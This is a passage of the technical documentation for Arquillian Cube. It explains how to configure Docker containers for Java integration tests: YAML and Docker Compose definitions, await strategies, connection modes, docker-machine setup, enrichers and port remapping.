Read the following link to understand why this is required: https:\/\/docs.jboss.org\/author\/display\/ARQ\/Tomcat+7.0+-+Remote\n\n== Configuration\n\n*Arquillian Cube* requires some parameters to be configured, some related to the _Docker_ server and others related to the image that is being used.\nLet's see the valid attributes:\n\n[cols=\"2*\"]\n|===\n|serverVersion\n|Version of the REST API provided by the _Docker_ server. You should check on the _Docker_ site which version of the REST API is shipped inside the installed _Docker_ service. This field is not mandatory, and if it's not set the default version provided by _docker-java_ will be used.\n\n|serverUri\n|URI of the _Docker_ server. If the _Docker_ server is running natively on Linux then this will be a URI pointing to the _localhost_ docker host, but if you are using _Boot2Docker_ or a remote _Docker_ server then the URI should be changed to point to the remote _Docker_ _URI_. It can be a unix socket URI as well in case you are running _Docker_ on Linux (+unix:\/\/\/var\/run\/docker.sock+). You can read about automatic resolution of the serverUri parameter in <<automatic-resolution, this section>>. You can also use the `DOCKER_HOST` Java property or system environment variable to set this parameter.\n\n|dockerRegistry\n|Sets the location of the Docker registry. The default value is the official _Docker_ registry located at https:\/\/registry.hub.docker.com\n\n|dockerContainers\n|Each _Docker_ image (or container) can be configured with different parameters. This configuration is provided in YAML format. This property can be used to embed all the configuration as a YAML string value.\n\n|dockerContainersFile\n|Instead of embedding YAML as a string, you can set the location of a YAML file with this attribute. The location can be relative to the root of the project, or a URI that is converted to a URL, so you can effectively have docker definitions on remote sites.\n\n|definitionFormat\n|Sets the format of the content expressed in the `dockerContainers` attribute or in the file set in `dockerContainersFile`. It can contain two possible values: _CUBE_ (the default in case it is not set) to indicate that the content is written following the <<cube-format, Arquillian Cube>> format, or _COMPOSE_ to indicate that the content is written following the <<docker-compose-format, Docker Compose>> format.\n\n|autoStartContainers\n|Cube will normally only start a _Docker_ container when it has the same name as an active _Arquillian_ container. That works for things that are _DeployableContainer_'s. For any other service, e.g. a database, you can use the _autoStartContainers_ option to define which _Docker_ containers to automatically start up. The option takes a comma separated list of _Docker_ container ids, e.g. _tomcat7, mysql_. *Arquillian Cube* will attempt to start the containers in parallel if possible, as well as start any linked containers.\n\n|certPath\n|Path where the certificates are stored. If you are not using the _https_ protocol this parameter is not required. This parameter accepts a leading ~ as the home directory.\n\n|boot2dockerPath\n|Sets the full location (and program name) of _boot2docker_. For example +\/opt\/boot2dockerhome\/boot2docker+.\n\n|dockerMachinePath\n|Sets the full location (and program name) of _docker-machine_. For example +\/opt\/dockermachinehome\/docker-machine+.\n\n|machineName\n|Sets the machine name in case you are using docker-machine to manage your docker host. 
This parameter is mandatory when using docker-machine.\n\n|connectionMode\n|Connection mode to bypass the Create\/Start Cube commands if a Docker Container with the same name is already running on the target system. This parameter can receive three possible values. _STARTANDSTOP_, the default if none is set, simply creates and stops all Docker Containers; if a container is already running, an exception is thrown. _STARTORCONNECT_ mode tries to bypass the Create\/Start Cube commands if a container with the same name is already running, and if that is the case doesn\u2019t stop it at the end. But if the container is not already running, Cube will start one and stop it at the end of the execution. And the last mode is _STARTORCONNECTANDLEAVE_, which is exactly the same as _STARTORCONNECT_, but if the container is started by Cube it won\u2019t be stopped at the end of the execution, so it can be reused in subsequent executions.\n|===\n\nSome of these properties can be provided by using the standard Docker system environment variables, so you can set them once and use them in your tests too.\nMoreover you can set them as Java system properties (-D...) as well.\n\n[cols=\"2*\"]\n|===\n|serverUri\n|DOCKER_HOST\n\n|certPath\n|DOCKER_CERT_PATH\n\n|machineName\n|DOCKER_MACHINE_NAME\n|===\n\nIn the next example you can see a whole YAML document with configuration properties.\nKeep in mind that almost all of them are configuration parameters provided by the _Docker_ remote API.\nIn this example we are going to explain the attributes that are most used, and special cases.\nOf course not all of them are mandatory:\n\nNOTE: In YAML, brackets (\"[\" \"]\") denote a list.\n\n[[cube-format]]\n[source, yaml]\n----\ntomcat: #1\n image: tutum\/tomcat:7.0 #2\n exposedPorts: [8089\/tcp] #3\n await: #4\n strategy: polling #5\n workingDir: .\n alwaysPull: false\n disableNetwork: true\n hostName: host\n portSpecs: [80,81]\n user: alex\n tty: true\n stdinOpen: true\n stdinOnce: true\n memoryLimit: 1\n memorySwap: 1\n cpuShares: 1\n cpuSet: a\n extraHosts: a\n attachStdin: true\n attachStderr: true\n env: [TOMCAT_PASS=mypass, JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089] #6\n cmd: [] #7\n dns: [127.0.0.1]\n volumes: [\/tmp]\n volumesFrom: [tomcat]\n binds:\n - \/host:\/container:ro\n links:\n - name:alias\n - name2:alias2\n portBindings: [8089\/tcp, 8081->8080\/tcp] #8\n privileged: true\n publishAllPorts: true\n networkMode: host\n dnsSearch: [127.0.0.1]\n entryPoint: [sh]\n devices:\n cGroupPermissions: a\n pathOnHost: b\n pathInContainer: c\n restartPolicy: #10\n name: failure\n maximumRetryCount: 1\n capAdd: [a]\n capDrop: [b]\n extends: container-id #9\n----\n<1> The name that is going to be assigned to the running container. It is *mandatory*.\n<2> The name of the image to be used. It is *mandatory*. If the image has not already been pulled by the _Docker_ server, *Arquillian Cube* will pull it for you. If you want to always pull the latest image before the container is created, you can configure *alwaysPull: true*.\n<3> Sets the exposed ports of the running container. It should follow the format _port number_, slash (\/), and _protocol_ (udp or tcp). Note that it is a list and it is not mandatory.\n<4> After a container is started, it starts booting up the defined services\/commands. Depending on the nature of the service, its lifecycle is linked to the start up or not. 
For example Tomcat, WildFly, TomEE and in general all Java servers must be started in the foreground, and this means that from the point of view of the client the container never finishes starting. But on the other hand, other services like Redis are started in the background, and when the container is started you can be sure that the Redis server is there. To avoid executing tests before the services are ready, you can set which await strategy should be used from the *Arquillian Cube* side to accept that the _Docker_ container and all its defined services are up and ready. It is not mandatory, and by default the polling with _ss_ command strategy is used.\n<5> In +strategy+ you set which strategy you want to follow. Currently three strategies are supported: _static_, _native_ and _polling_.\n<6> You can pass environment variables by using `env`. In this section you can set the special `dockerServerIp` string, which at runtime will be replaced by _Cube_ with the current docker server ip.\n<7> After the container is up, a list of commands can be executed within it.\n<8> Port forwarding is configured using the `portBindings` section. It contains a list of `exposedPort` and `port` pairs separated by an arrow (_->_). If only one port is provided, *Arquillian Cube* will expose the same port number. In this example the exposed port 8089 is mapped to 8089 and the exposed port 8080 is mapped to 8081.\n<9> You can extend another configuration. Any top level element and its children from the target container-id will be copied over to this configuration, unless they have been defined here already.\n<10> Sets the restart policy of the container (the policy name and the maximum retry count).\n\nAs we've seen in the basic example, the definition of the Arquillian Cube scenarios is described in the `dockerContainers` property.\nBut if you want you can avoid using this property by simply creating a file called `cube` in the root of the classpath of your project.\n_Arquillian Cube_ will read it as if it was defined in the `arquillian.xml` file.\n\n[source, yaml]\n.src\/test\/resources\/cube\n----\ntomcat:\n image: tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: polling\n env: [TOMCAT_PASS=mypass, JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false]\n portBindings: [8089\/tcp, 8080\/tcp]\n----\n\n=== Await\n\nAfter a container is started, it starts booting up the defined services\/commands.\nDepending on the nature of the service, its lifecycle is linked to the start up or not.\nFor example Tomcat, WildFly, TomEE and in general all Java servers must be started in the foreground, and this means that from the point of view of the _Docker_ client the container never finishes starting.\nBut on the other hand, other services like Redis are started in the background, and when the container is started you can be sure that the Redis server is there.\nTo avoid executing tests before the services are ready, you can set which await strategy should be used from the *Arquillian Cube* side to accept that the _Docker_ container and all its defined services are up and ready.\n\nCurrently the following await strategies are supported:\n\nnative:: it uses the *wait* command. In this case the current thread waits until the _Docker_ server notifies that the container has started. In case of foreground services this is not the approach to use.\npolling:: in this case polling (with the _ping_ or _ss_ command) is executed for 5 seconds against all exposed ports. When communication to all exposed ports is acknowledged, the container is considered to be up. 
This approach is the one to use for services started in the foreground. By default _polling_ executes the _ss_ command inside the running container to know if the server is already running. You can use a _ping_ from the client by setting the +type+ attribute to +ping+. Note that _ping_ only works if you are running the _Docker_ daemon on +localhost+. In almost all cases the default behaviour matches all scenarios. If it is not specified, this is the default strategy.\nstatic:: similar to _polling_ but it uses the host ip and a specified list of ports provided as a configuration parameter. This can be used in case of using _Boot2Docker_.\nsleeping:: sleeps the current thread for the specified amount of time. You can specify the time in seconds or milliseconds.\n\nBy default, in case you don't specify any _await_ strategy, polling with the _ss_ command is used.\n\n[source, yaml]\n.Example native\n----\ntomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: native\n----\n\n[source, yaml]\n.Example polling using ss command by default\n----\ntomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: polling\n sleepPollingTime: 200 s #1\n iterations: 3 #2\n----\n<1> Optional parameter to configure the sleeping time between polls. You can set it in seconds using _s_ or milliseconds using _ms_. By default the time unit is milliseconds and the value is 500.\n<2> Optional parameter to configure the number of retries to be done. By default 10 iterations are done.\n\n[source, yaml]\n.Example static\n----\ntomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: static\n ip: localhost\n ports: [8080, 8089]\n----\n\n[source, yaml]\n.Example sleeping\n----\ntomcat:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: sleeping\n sleepTime: 200 s #1\n----\n<1> Optional parameter to configure the sleeping time. You can set it in seconds using _s_ or milliseconds using _ms_. By default the time unit is milliseconds and the value is 500.\n\n=== Inferring exposedPorts from portBinding\n\nWhen you are using _Docker_ you can set two different parameters, +exposedPort+ and +portBinding+.\n+exposedPorts+ are ports that are available inside the _Docker_ infrastructure; they are used for communication between _Docker_ containers but not from outside.\nOn the other hand +portBindings+ are a way to instruct a _Docker_ container to publish a port so it is available from outside (for example from our test).\n\nIt seems reasonable that if you set a port binding this port should automatically be an exposed port as well.\nFor this reason in *Arquillian Cube* you can set only +portBinding+ and the port will automatically be registered as an exposed port too.\n\nIn the next example we are only setting +portBinding+, and *Arquillian Cube* will instruct _Docker_ to expose port 8080 and of course bind port 8080 so it is accessible from outside.\n\n[source, yaml]\n.arquillian.xml\n----\ndaytime:\n buildImage:\n dockerfileLocation: src\/test\/resources\/undertow\n noCache: true\n remove: true\n await:\n strategy: polling\n portBindings: [8080\/tcp]\n----\n\nAlso it is not necessary to set the network protocol (tcp or udp).\nIf the protocol is not specified, as in `portBindings: [\"8080\"]`, then _tcp_ is used by default.\nNotice that you need to add double quotes to stringify the value.\n\n=== Allow connecting to a running container\n\nWith the configuration option +connectionMode+ you can bypass\nthe Create\/Start Cube commands if a _Docker_ Container with the same name is already\nrunning on the target system. 
If so, *Arquillian Cube* will reuse that Container moving forward.\n\nThis allows you to prestart the containers manually during development and just\nconnect to them to avoid the extra cost of starting the _Docker_ Containers for each test\nrun. This assumes you are not changing the actual definition of the _Docker_ Container itself.\n\nAn example of this configuration could be:\n\n[source, xml]\n.arquillian.xml\n----\n<extension qualifier=\"docker\">\n <property name=\"serverVersion\">1.12<\/property>\n <property name=\"serverUri\">http:\/\/localhost:2375<\/property>\n <property name=\"connectionMode\">STARTORCONNECT<\/property>\n <property name=\"dockerContainers\">\n tomcat:\n #more properties\n <\/property>\n<\/extension>\n----\n\n+connectionMode+ is an attribute that can receive three values:\n\nSTARTANDSTOP:: the default one if none is set; it simply creates and stops all _Docker_ Containers. If a container is already running, an exception is thrown.\nSTARTORCONNECT:: tries to bypass the Create\/Start Cube commands if a container with the same name is already running, and if that is the case it doesn\u2019t stop it at the end. But if the container is not already running, Cube will start one and stop it at the end of the execution.\nSTARTORCONNECTANDLEAVE:: exactly the same as _STARTORCONNECT_, but if the container is started by Cube it won\u2019t be stopped at the end of the execution, so it can be reused in subsequent executions.\n\n=== Before Stop Events\n\nSometimes when the tests have finished and the container is stopped you want to inspect some data, like the container console, or retrieve a file from the container for manual inspection.\nIn these cases you can configure each container to copy the console log or copy files from the container to the local machine just before the container is stopped.\n\nThe next snippet shows how to copy a directory from the container to the local disk:\n\n[source, yaml]\n----\ntomcat_default:\n image: tutum\/tomcat:7.0\n beforeStop: # <1>\n - copy: # <2>\n from: \/test\n to: \/tmp\n\n - log: # <3>\n to: \/tmp\/container.log\n----\n<1> +beforeStop+ goes into the container section and may contain a list of +copy+ and +log+ elements.\n<2> +copy+ is used to notify that we want to copy some directories or files from the +from+ container location to the +to+ local location.\n<3> +log+ is used to notify that we want to copy the container log to the +to+ local location.\n\nIn case of the +log+ command both the standard output and the error output are returned.\nThe +log+ _Docker_ command can receive some configuration parameters and you can set them in the configuration file too.\n\n[source, yaml]\n.Example of log parameters\n----\nbeforeStop:\n - log:\n to: \/tmp\/container.log\n follow: true\n stdout: true\n stderr: false\n timestamps: true\n tail: 10\n----\n\n[[automatic-resolution]]\n=== Automatic serverUri resolution\n\nThe +serverUri+ parameter is where you configure the URI of the _Docker_ server.\nThis parameter is not mandatory, and in case you don't set it _Arquillian Cube_ will use the following values:\n\n[cols=\"2*\"]\n|===\n|Linux\n|unix:\/\/\/var\/run\/docker.sock\n\n|Windows\n|https:\/\/dockerHost:2376\n\n|MacOS\n|https:\/\/dockerHost:2376\n\n|Docker Machine\n|https:\/\/dockerHost:2376\n|===\n\n[[boot2docker]]\n== Boot2Docker and Docker Machine\n\nIf you are using _boot2docker_ or _docker machine_ there are some parameters that depend on the local installation.\nFor example the _boot2docker_ ip is not _localhost_ and may change every time you start a new _boot2docker_ instance.\nAlso, every time you start it, _boot2docker_ copies 
the required certificates to the home directory of the local machine.\n\n_Arquillian Cube_ offers some automatic mechanisms to use _boot2docker_ or _docker machine_ in _Cube_.\n\nThe first one is that the +serverUri+ parameter can contain the word +dockerHost+, as in +https:\/\/dockerHost:2376+.\nWhen _Cube_ is started it will check if the +serverUri+ contains the _dockerHost_ word, and if that is the case it will do the following:\n\n. if the docker machine name is provided by using the +machineName+ property, then the Docker Machine command is run to get the ip that replaces `dockerHost`.\n. if the previous condition is not met, then the _boot2docker_ command is run to get the ip that replaces `dockerHost`.\n\n=== Boot2Docker\n\nIn case of _boot2docker_ it will run the command +boot2docker ip+ to get the ip and substitute the _dockerHost_ keyword with the ip returned by that command.\n\nNote that by default _Arquillian Cube_ assumes that the +boot2docker+ command is on the +PATH+, but you can configure its location by using the +boot2dockerPath+ property, which is the full location (and program name) of _boot2docker_.\nFor example +\/opt\/boot2dockerhome\/boot2docker+.\n\n_boot2docker_ runs over _https_ and you need to set the certificates path.\nThese certificates are copied by _boot2docker_ by default to +<HOME>\/.boot2docker\/certs\/boot2docker-vm+.\nIf this property is not set and the +serverUri+ contains +dockerHost+, then this property is automatically configured to +<HOME>\/.boot2docker\/certs\/boot2docker-vm+, so you don't need to worry about setting it for each environment.\n\n=== Docker Machine\n\nIn case of _docker-machine_ it will run the command +docker-machine ip <machineName>+ to get the ip and substitute the _dockerHost_ keyword with the ip returned by that command.\n\nNote that by default _Arquillian Cube_ assumes that the +docker-machine+ command is on the +PATH+, but you can configure its location by using the +dockerMachinePath+ property, which is the full location (and program name too) of _docker-machine_.\nFor example +\/usr\/bin\/docker-machine+.\n\n_docker-machine_ can run together with _boot2docker_.\nThis docker host instance runs over _https_, so you need to set the certificates path.\nThese certificates are copied by _docker-machine_ by default to +<HOME>\/.docker\/machine\/machines+.\nIf this property is not set and _docker-machine_ is run, then this property is automatically configured to the default location, so you don't need to worry about setting it for each environment.\n\nFor example you can configure the +arquillian.xml+ file to use _docker-machine_ as:\n\n[source, xml]\n.arquillian.xml\n----\n<extension qualifier=\"docker\">\n <property name=\"serverVersion\">${docker.api.version}<\/property>\n <property name=\"definitionFormat\">COMPOSE<\/property>\n <property name=\"machineName\">dev<\/property> <!-- 1 -->\n <property name=\"dockerContainersFile\">docker-compose.yml<\/property>\n<\/extension>\n----\n<1> Sets the docker machine to _dev_.\n\nNotice that you only need to add the _machineName_ property; everything else is exactly the same as in previous examples.\n\n== Building containers\n\nTo build a container _Docker_ uses a file called +Dockerfile+ (see http:\/\/docs.docker.com\/reference\/builder\/).\n*Arquillian Cube* also supports building and running a container from a +Dockerfile+.\n\nTo indicate that *Arquillian Cube* must build the container, the +image+ property must be changed to +buildImage+, which sets the location of the +Dockerfile+.\n\nLet's see the previous example, but instead of creating a container from a predefined image, we are going 
to build one:\n\n[source, xml]\n.arquillian.xml\n----\n<property name=\"dockerContainers\">\n tomcat:\n buildImage: #1\n dockerfileLocation: src\/test\/resources-tomcat-7-dockerfile\/tomcat #2\n noCache: true #3\n remove: true #4\n dockerfileName: my-dockerfile #5\n await:\n strategy: polling\n env: [JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false]\n portBindings: [8089\/tcp, 8080\/tcp]\n<\/property>\n----\n<1> The +buildImage+ section is used in place of +image+. If both sections are present in a document, the +image+ section takes precedence over +buildImage+.\n<2> +dockerfileLocation+ contains the location of the +Dockerfile+ and all files required to build the container.\n<3> Property to enable or disable the no cache attribute.\n<4> Property to enable or disable the remove attribute.\n<5> Property to set the dockerfile name to be used instead of the default one.\n\nTIP: +dockerfileLocation+ can be a directory that contains a +Dockerfile+ in its root (in case you don't set the _dockerfileName_ property), a +tar.gz+ file, or a _URL_ pointing to a +tar.gz+ file.\n\nAn example of a +Dockerfile+ is:\n\n[source, properties]\n.src\/test\/resources-tomcat-7-dockerfile\/tomcat\/Dockerfile\n----\nFROM tutum\/tomcat:7.0\n\nENV JAVA_OPTS -Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false\nADD tomcat-users.xml \/tomcat\/conf\/ # <1>\nEXPOSE 8089\nCMD [\"\/tomcat\/bin\/catalina.sh\",\"run\"]\n----\n<1> The +tomcat-users.xml+ file is located in the same directory as the +Dockerfile+.\n\n[[docker-compose-format]]\n== Docker-Compose Format\n\nInstead of the Arquillian Cube format, you can use the Docker Compose format to define the container layout. This means that you can use the same Docker Compose file for running your tests with Arquillian Cube and, without any change, run the `docker-compose up` command from a terminal and get the same result.\n\nIt is important to note that this is not a docker-compose implementation but only the docker-compose format. This means that, for example, you cannot use some _docker-compose_ CLI capabilities such as starting several instances of the same service.\n\nSome Arquillian Cube specific attributes, such as the await strategy, cannot be configured, and the default values are going to be used.\n\nMoreover, there are some docker-compose commands that are not implemented yet due to restrictions of the docker-java library. These commands are _label_, _pid_, _domainname_, _log_driver_, _security_opt_ and _read_only_. They will be implemented as soon as the docker-java library adds support for them.\n\nFinally, in case you define a command that is not implemented in Arquillian Cube, this command will be ignored (no exception will be thrown), but a log line will be printed to notify you of this situation. If this happens, it is really important that you open a bug so we can add support for it.
Despite these limitations, we will try to stay aligned with the latest docker-compose format.\n\nLet's see how you can rewrite the previous HelloWorld example with Tomcat to use the docker-compose format.\n\nFirst let's create a file called `envs` at the root of the project, which configures environment variables:\n\n[source]\n.envs\n----\nTOMCAT_PASS=mypass\nJAVA_OPTS=-Djava.rmi.server.hostname=localhost -Dcom.sun.management.jmxremote.rmi.port=8088 -Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false\n----\n\nThen you can create a file called `docker-compose.yml` at the root of the project, following docker-compose conventions:\n\n[source, yml]\n.docker-compose.yml\n----\ntomcat:\n env_file: envs\n image: tutum\/tomcat:7.0\n ports:\n - \"8089:8089\"\n - \"8088:8088\"\n - \"8081:8080\"\n----\n\nand finally you can configure in the `arquillian.xml` file that you want to use the docker-compose format.\n\n[source, xml]\n.src\/test\/resources\/arquillian.xml\n----\n<extension qualifier=\"docker\">\n <property name=\"serverVersion\">1.13<\/property>\n <property name=\"serverUri\">localhost<\/property>\n <property name=\"definitionFormat\">COMPOSE<\/property>\n <property name=\"dockerContainersFile\">docker-compose.yml<\/property>\n<\/extension>\n\n<container qualifier=\"tomcat\">\n <configuration>\n <property name=\"host\">${docker.tomcat.host}<\/property>\n <property name=\"httpPort\">8081<\/property>\n <property name=\"user\">admin<\/property>\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n<\/container>\n----\n\nAnd that's all; you can now reuse your existing docker-compose files in Arquillian Cube too.\nYou can see the full example at: https:\/\/github.com\/arquillian\/arquillian-cube\/tree\/master\/docker\/ftest-docker-compose\n\n== Enrichers\n\n*Arquillian Cube* comes with a few enrichers.\n\nOne for injecting the +CubeID+ (_containerId_) of the current container created for executing the test, one that injects the +CubeController+ to call lifecycle methods on any cube, and one that injects the +com.github.dockerjava.api.DockerClient+ instance used to communicate with the _Docker_ server.\n\nDockerClient injection only works if the tests are run in client mode, that is, by using +@RunAsClient+ or by setting the testable property to false with +@Deployment(testable = false)+.\n\nThese can be injected using the +@ArquillianResource+ annotation.\n\nAs examples:\n\n[source, java]\n.CubeIDResourceProvider.java\n----\n@ArquillianResource\nCubeID containerId;\n----\n\n[source, java]\n.CubeResourceProvider.java\n----\n@ArquillianResource\nDockerClient dockerClient;\n----\n\n[source, java]\n.CubeControllerProvider.java\n----\n@ArquillianResource\nCubeController cubeController;\n----\n
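\nAs a minimal usage sketch (illustrative only, not part of the original examples; the cube name `tomcat` is a hypothetical id assumed to be defined in +arquillian.xml+), a client-mode test could use the injected +CubeController+ to restart a cube:\n\n[source, java]\n.CubeLifecycleTest.java\n----\n@RunWith(Arquillian.class)\npublic class CubeLifecycleTest {\n\n @ArquillianResource\n CubeController cubeController; \/\/ injected by Arquillian Cube\n\n @Test\n public void shouldRestartCube() {\n \/\/ stop and start again the cube named 'tomcat' (hypothetical cube id)\n cubeController.stop(\"tomcat\");\n cubeController.start(\"tomcat\");\n }\n}\n----\n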
\n=== Auto starting Cubes outside of Arquillian Containers\n\nProbably any application you write will need not only an application\/servlet container but also other servers, like a database server or a mail server.\nEach one will be placed in its own _Docker Container_.\nSo for example a full application may contain one _Docker Container_ with an application server (for example _Wildfly_) and another container with a database (for example _H2_).\n\n*Arquillian Cube* can orchestrate these containers as well.\n\nAn example of orchestration can be:\n\n[source, xml]\n.arquillian.xml\n----\n<property name=\"autoStartContainers\">database<\/property> <!--1-->\n<property name=\"dockerContainers\">\n wildfly_database:\n extends: wildfly\n links:\n - database:database #2\n database:\n image: zhilvis\/h2-db\n exposedPorts: [81\/tcp, 1521\/tcp]\n await:\n strategy: polling\n portBindings: [1521\/tcp, 8181->81\/tcp]\n <\/property>\n\n<container qualifier=\"wildfly_database\">\n <configuration>\n <property name=\"target\">wildfly:8.1.0.Final:remote<\/property>\n <property name=\"managementPort\">9991<\/property>\n <property name=\"username\">admin<\/property>\n <property name=\"password\">Admin#70365<\/property>\n <\/configuration>\n<\/container>\n----\n<1> This property is used to start containers before any test is executed; in this case the _database_ container.\n<2> We use the _link_ property to connect the _Wildfly_ container to the _database_ container.\n\nIn this case when a test is started both containers are started, and when both are ready to receive requests the test will be executed.\n\nAnd the data source definition shall be:\n\n[source, java]\n.UserRepository.java\n----\n@DataSourceDefinition(\n name = \"java:app\/TestDataSource\",\n className = \"org.h2.jdbcx.JdbcDataSource\",\n url = \"jdbc:h2:tcp:\/\/database:1521\/opt\/h2-data\/test\",\n user = \"sa\",\n password = \"sa\"\n)\n@Stateless\npublic class UserRepository {\n\n @PersistenceContext\n private EntityManager em;\n\n public void store(User user) {\n em.persist(user);\n }\n}\n----\n
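\nAs a usage sketch (hypothetical test; the +User+ constructor used here is assumed and not shown in the original example), a test could then exercise this repository against the linked _database_ container:\n\n[source, java]\n.UserRepositoryTest.java\n----\n@RunWith(Arquillian.class)\npublic class UserRepositoryTest {\n\n @EJB\n UserRepository userRepository; \/\/ backed by the datasource defined above\n\n @Test\n public void shouldStoreUserInLinkedDatabase() {\n \/\/ persists through the H2 cube linked as 'database'\n userRepository.store(new User(\"john\"));\n }\n}\n----\n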
\n=== Auto-Remapping\n\n*Arquillian Cube* can automatically configure the default ports of a container in case of port forwarding.\n\nWhat *Arquillian Cube* does internally is remap the default `DeployableContainer` port values to the ones configured in the _Docker Containers_ configuration.\n\nSuppose you have a _Docker Container_ configuration like:\n\n[source, xml]\n.arquillian.xml\n----\n<property name=\"dockerContainers\">\n tomcat_default:\n image: tutum\/tomcat:7.0\n exposedPorts: [8089\/tcp]\n await:\n strategy: polling\n env: [TOMCAT_PASS=mypass, JAVA_OPTS=-Dcom.sun.management.jmxremote.port=8089 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false]\n portBindings: [8089\/tcp, 8081->8080\/tcp] #1\n<\/property>\n----\n<1> Note that the exposed port is 8081.\n\nThen in theory you should configure the remote _Tomcat_ adapter to port 8081 in your _arquillian.xml_ file.\nBut let's say that you are using that remote adapter for a local machine _Tomcat_ (outside _Docker_) too, and it is configured to use port 8080.\n\n[source, xml]\n.arquillian.xml\n----\n<container qualifier=\"tomcat_default\">\n <configuration>\n <property name=\"host\">localhost<\/property>\n <property name=\"user\">admin<\/property>\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n<\/container>\n----\n\nThis basically uses the default port (8080) to connect to the remote server.\n\nIn this case you don't need to create a new `container` tag; *Arquillian Cube* is smart enough to change the default port value automatically, in the case of _Tomcat_ from 8080 to 8081.\n*Arquillian Cube* will apply auto-remapping to all properties that contain `port` as a substring of the property name, and will remap if necessary.\n\nNOTE: Auto-remapping only works in case you want to change the default server port to a _Docker_ port-forwarded port.\n\n=== DockerServerIp and Containers\n\nIf you are using a remote docker server (not on _localhost_) or for example _boot2docker_, you may want to set that ip in the Arquillian remote adapter configuration so it can deploy the archive under test.\nIn these cases you can hardcode this ip in the Arquillian container adapter configuration, or you can use the special tag +dockerServerIp+.\nAt runtime this tag will be replaced by _Arquillian Cube_ with the docker server ip configured in the +serverUri+ parameter.\nThis replacement only works in properties that contain the string +host+ or +address+ in the property name.\n\nSo for example:\n\n[source, xml]\n.arquillian.xml\n----\n<extension qualifier=\"docker\">\n <property name=\"serverUri\">http:\/\/192.168.0.2:2756<\/property> <!--1-->\n ...\n<\/extension>\n<container qualifier=\"tomcat_default\">\n <configuration>\n <property name=\"host\">dockerServerIp<\/property> <!--2-->\n <property name=\"user\">admin<\/property>\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n<\/container>\n----\n<1> We set the +serverUri+ as usual.\n<2> +dockerServerIp+ is replaced at runtime.\n\nThe +host+ property will be automatically replaced with +192.168.0.2+.\n\nNOTE: This also works in case you set +serverUri+ using the +boot2docker+ special word or by using the defaults. Read more about it in the <<boot2docker, Boot2Docker section>> and the <<automatic-resolution, Automatic serverUri resolution section>>.\n\nIn case of using a _unix_ socket, +dockerServerIp+ is replaced with _localhost_.\n\n_Arquillian Cube_ can also help you in another way, by inferring the +boot2docker+ ip.\nIn case you are running on _MacOS_ or _Windows_ with +boot2docker+, you may not need to set the host property at all, nor use +dockerServerIp+.\n_Arquillian Cube_ will inspect any property in the configuration class that contains the word _address_ or _host_ and is not overridden in `arquillian.xml`, and it will set the +boot2docker+ server automatically.\n\nSo the previous example could be modified to:\n\n[source, xml]\n.arquillian.xml\n----\n<container qualifier=\"tomcat_default\">\n <configuration>\n <property name=\"user\">admin<\/property>\n <property name=\"pass\">mypass<\/property>\n <\/configuration>\n<\/container>\n----\n\nAnd in case you are running on _Windows_ or _MacOS_, the `host` property will be automatically set to the +boot2docker+ _ip_.\n\n== Containerless Server and Docker\n\nIn all previous sections we have seen that the application is deployed inside a container.\nFor example, in the case of _Tomcat_, application resources are deployed inside a _Servlet_ container, or in the case of _Apache TomEE_ you can deploy _EJBs_ inside an _EJB_ container.\n\nBut nowadays there are other kinds of applications that contain the container (if they have one) embedded inside them.\nTypically these applications use an embedded server and they are run as _CLI_ applications.\nSome examples are _Spring Boot_, _Netty_, _SparkJava_ or _Undertow_.\n\nIf you are using some of these technologies with _Docker_, you can still use *Arquillian Cube* to write your tests.\n\n=== Java Embedded Servers\n\nLet's suppose we are writing a service which should return the current day and time as text.\nTo serve this service to the world we decide to use the _Undertow_ embedded server.\n\nThe code looks like:\n\n[source, java]\n.DaytimeServer.java\n----\nimport io.undertow.Undertow;\nimport io.undertow.server.HttpHandler;\nimport io.undertow.server.HttpServerExchange;\nimport io.undertow.util.Headers;\n\nimport java.text.SimpleDateFormat;\nimport java.util.Date;\n\npublic class DaytimeServer {\n\n public static void main(String[] args) { \/\/<1>\n\n Undertow server = Undertow.builder()\n .addHttpListener(8080, \"0.0.0.0\")\n .setHandler(new HttpHandler() {\n @Override\n public void handleRequest(final HttpServerExchange exchange) throws Exception {\n SimpleDateFormat simpleDateFormat = new SimpleDateFormat();\n 
exchange.getResponseHeaders().put(Headers.CONTENT_TYPE, \"text\/plain\");\n exchange.getResponseSender().send(simpleDateFormat.format(new Date()) + System.lineSeparator()); \/\/<2>\n }\n }).build();\n server.start();\n }\n}\n----\n<1> This class is a CLI application.\n<2> Returns the day and time as text, formatted with +SimpleDateFormat+.\n\nNote that this application is a CLI application, which is pretty different from previous examples.\nPreviously the packaged application was deployed inside an application server, which in fact means that *Arquillian* connects to the server and tells it to deploy that file.\n\nIn this example there is no application server or servlet container waiting for *Arquillian* to deploy an archive; the application is self-contained, it contains everything.\nSo in fact if you want to run the application you will probably end up doing something like +java -jar daytime.jar+.\n\nSo how do you write a test for these classes if we are using _Docker_ as the runtime container?\n\nThe first thing to do is add the +arquillian-cube-containerless+ dependency.\n\n[source, xml]\n.pom.xml\n----\n<dependency>\n <groupId>org.arquillian.cube<\/groupId>\n <artifactId>arquillian-cube-containerless<\/artifactId>\n <version>${arquillian.cube.version}<\/version>\n<\/dependency>\n----\n\nThe next step is creating a +Dockerfile+.\nThis is required because we need to set not only the container image to be used but also how to run the application.\nBut note that there is a problem with creating a +Dockerfile+ in this case.\nThe +jar+ name is not static because it will depend on the name you give during the creation of the archive (using 